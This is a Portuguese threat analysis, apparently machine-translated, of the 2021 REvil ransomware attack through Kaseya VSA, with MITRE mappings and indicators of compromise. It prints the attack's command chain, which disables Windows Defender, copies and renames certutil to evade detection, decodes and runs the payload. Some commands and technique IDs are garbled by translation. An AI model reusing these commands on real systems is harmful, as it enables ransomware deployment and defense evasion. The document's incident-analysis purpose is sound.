Incidente de ransomware na cadeia de suprimentos Kaseya VSA

Em 02 de julho de 2021, a Kaseya, desenvolvedora de soluções de TI voltada para provedores de serviços gerenciados (MSPs), divulgou que eles foram vítimas de um ataque de ransomware em grande escala. O ataque, que foi propagado pelo popular grupo RaaS REvil, teve como alvo a infraestrutura VSA da Kaseya, comprometendo suas cadeias de suprimentos. O grupo de ransomware explorou uma vulnerabilidade específica de autenticação de dia zero no aplicativo para fazer upload de um arquivo malicioso codificado em Base64, infectando a infraestrutura do cliente que tem um programa agente VSA em execução nos servidores de destino.

Vetor de entrega da cadeia de suprimentos

O VSA da Kaseya é um software de monitoramento e gerenciamento remoto (RMM) que permite que os MSPs realizem gerenciamento de patches, backups e monitoramento de clientes para clientes. Os agentes da ameaça aproveitaram uma vulnerabilidade de desvio de autenticação de dia zero na interface web do VSA para obter uma sessão autenticada, carregar carga útil e executar uma série de comandos via SQL para obter a execução do comando. O ransomware foi entregue como uma atualização de software disfarçada como “Kaseya VSA Agent Hot-fix”. Esse procedimento implantou um criptografador, que comprometeu o servidor VSA e foi descartado no TempPath, com o nome de arquivo “agent.crt”.

O arquivo de carga útil “agent.crt” é enviado para um programa de monitoramento de agentes (C:\PROGRAM FILES (X86)\ KASEYA\<ID>\ AGENTMON.EXE, em que ID é a chave de identificação do servidor conectado à instância do monitor), que monitora os endpoints do cliente e determina se um terminal precisa de patches ou atualizações, apenas para instalá-los silenciosamente em segundo plano. O monitor do agente então grava “agent.crt” no diretório de trabalho do agente VSA (C:\KWORKING\AGENT.crt).

“C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nulo &
C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe Set-mpPreference -DisableRealtime Monitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MapsReporting Disabled -SubmitSampleConsent Nunca envie e copie /Y C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe c:\kworking\agent.exe

Execução

O comando a seguir é usado para atrasar ou desativar a execução dos comandos do PowerShell:

“C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nulo

Em seguida, um comando do PowerShell é executado pelo monitor do agente, conforme mostrado abaixo:

C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe Set-MPreference

• Desativar o monitoramento em tempo real $ true

• Desativar sistema de prevenção de intrusões $ true

• Desativar a proteção IOAV $ true

• Desabilitar o ScriptScanning $true

• Ativar acesso controlado à pasta desativado

• Ativar modo de auditoria de proteção de rede - Force

• Relatórios de mapas desativados

• Enviar amostras Consentimento Nunca enviar

Esses comandos desativam várias proteções implementadas no sistema de destino, especificamente recursos do Windows Defender, como proteção de rede, iOfficeAntivirus (IOAV), verificação de scripts, relatórios do MAPS etc.

O comando a seguir cria uma cópia do arquivo “certutil.exe”, um utilitário de gerenciamento de certificados presente em todas as versões do Windows, do local padrão para o Diretório do Windows e o renomeia como “cert.exe”:

copiar /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe

Essa linha de comando anexa dados aleatórios ao final do cert.exe para alterar sua assinatura, o que ajuda a evitar produtos de segurança antimalware:

echo %RANDOM% >> C:\Windows\cert.exe

O próximo comando decodifica o arquivo “agent.crt” para “agent.exe”:

C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe

Em seguida, essa linha de comando limpa o arquivo e executa “agent.exe”:

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Agent.exe: O conta-gotas

Agent.exe é um dropper que baixa os seguintes artefatos:

ArtifactsDescriptionMSMPeng.exeComponente Windows Defender assinado por MicrosoftMPSvc.dll Parte de MsMpEng.exe

O REvil usa uma versão específica do “MsMpEng.exe”, que é vulnerável ao carregamento lateral da biblioteca de vínculo dinâmico (DLL), que é um método popular de ataque cibernético que aproveita a forma como os aplicativos lidam com arquivos DLL. Ele usa arquivos DLL maliciosos em vez de arquivos legítimos, que são então carregados e executados, infectando o servidor de destino.

Implantação do Ransomware Locker

Um Ransomware Locker está oculto no arquivo “mpsvc.dll” e é executado quando “MsMpEng.exe” é executado pelo arquivo “agent.exe”. Essa é uma tática de evasão empregada pelo agente da ameaça para contornar as verificações de segurança.

Táticas e técnicas do MITRE ATT&CK

Acesso inicial T1059.002 Compromisso da cadeia de suprimentos: comprometa o software Supply ChainExecutionT1059.001 Intérprete de comandos e scripts: PowerShellPersistence & Privilege EscalationT1574.002 Fluxo de execução de sequestro: DLL Side-LoadingDefense EvasionT1036.003 Mascaramento: renomear utilitários do sistemaT1562.001 Diminuir defesas: desativar ou modificar ferramentas T1140 Desofusque/decodifique arquivos ou informaçõesT1574.002 Fluxo de execução de sequestro: carregamento lateral de DLLT1070.004 Remoção do indicador no host: exclusão de arquivoT112 Modificar registroT1553.002 Subverter controles de confiança: assinatura de códigoImpactT1486 Data Criptografado para ImpactFiles C:\kworking\agent.exe (REvil Dropper)

Indicadores de compromisso

TipoIndicador

• SHA-256
• SHA-1
• MD5

• d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
• 5162f14d75e96edb914d1756349d6e11583db0b0
• 561cffbaba71a6e8cc1cdceda990ead4

• SHA-256
• SHA-1
• MD5

• df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e
• 682389250d914b95d6c23ab29dffee11cb65cae9
• 0299e3c2536543885860c7b61e1efc3f

• SHA-256
• SHA-1
• MD5

• dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f
• 8118474606a68c03581eef85a05a90275aa1ec24
• 835f242dde220cc76ee5544119562268

• SHA-256
• SHA-1
• MD5

• d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
• 5162f14d75e96edb914d1756349d6e11583db0b05162f14d75e96edb914d1756349d6e11583db0b0
• 561cffbaba71a6e8cc1cdceda990ead4

• SHA-256
• SHA-1
• MD5

• 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8
• 20e3a0955baca4dc7f1f36d3b865e632474add77
• 5a97a50e45e64db41049fd88a75f2dd2

• SHA-256
• SHA-1
• MD5

• 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471
• 13d57aba8df4c95185c1a6d2f945d65795ee825b
• be6c46239e9c753de227bf1f3428e271

• SHA-256
• SHA-1
• MD5

• 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e
• 3c2b0dcdb2a46fc1ec0a12a54309e35621caa925
• 18786bfac1be0ddf23ff94c029ca4d63
• C:\Windows\mpsvc.dll (DLL do REvil /Sodinokibi)

• SHA-256
• SHA-1
• MD5

• 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
• 656c4d285ea518d90c1b669b79af475db31e30b1
• a47cf00aedf769d60d58bfe00c0b5421

• SHA-256
• SHA-1
• MD5

• e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
• e1d689bf92ff338752b8ae5a2e8d75586ad2b67b
• 7ea501911850a077cf0f9fe6a7518859

• SHA-256
• SHA-1
• MD5

• d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20
• 1bcf1ae39b898aaa8b6b0207d7e307b234614ff6
• 849fb558745e4089a8232312594b21d2

• SHA-256
• SHA-1
• MD5

• d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f
• 7895e4d017c3ed5edb9bf92c156316b4990361eb
• 4a91cb0705539e1d09108c60f991ffcf

• SHA-256
• SHA-1
• MD5

• cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6
• 45c1b556f5a875b71f2286e1ed4c7bd32e705758
• 7d1807850275485397ce2bb218eff159

• SHA-256
• SHA-1
• MD5

• 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
• c0f569fc22cb5dd8e02e44f85168b4b72a6669c3
• 040818b1b3c9b1bf8245f5bcb4eebbbc

• SHA-256
• SHA-1
• MD5

• 8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f
• c2bb3eef783c18d9825134dc8b6e9cc261d4cca7
• a560890b8af60b9824c73be74ef24a46

C:\Windows\cert.exe

• SHA256

• 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752

(Observação: usar esse hash é ineficaz, pois é uma versão do arquivo certutil.exe com adição aleatória de caracteres. Você deve usar a detecção baseada em comportamento, por exemplo, renomear/copiar certutil.exe)
C:\windows\msmpeng.exe

• SHA-256
• SHA-1
• MD5

• 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
• 3d409b39b8502fcd23335a878f2cbdaf6d721995
• 8cc83221870dd07144e63df594c391d9

(Observação: esse arquivo é uma versão mais antiga do Windows Defender. É um binário legítimo, mas é usado para fins maliciosos por adversários como outras ferramentas que vivem fora da terra.)
C:\Program Files (x86)\ Kaseya\<ID>\ AgentMon.exe (binário legítimo do Kaseya VSA usado para execução remota)

 

Domínios https://github.com/pgl/kaseya-revil-cnc-domains/blob/main/revil-kaseya-cnc-domains.txtYARA Rules https://github.com/cado-security/DFIR_Resources_REvil_Kaseya/blob/main/IOCs/Yara.rulesRegistry KEYSHKEY_LOCAL_MACHINE\ SOFTWARE\ Wow6432Node\ BlackLivesMatter

 

 

Referências

https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident

https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/

https://www.picussecurity.com/resource/blog/revil-sodinokibi-ransomware-kaseya-vsa-msp-supply-chain-attack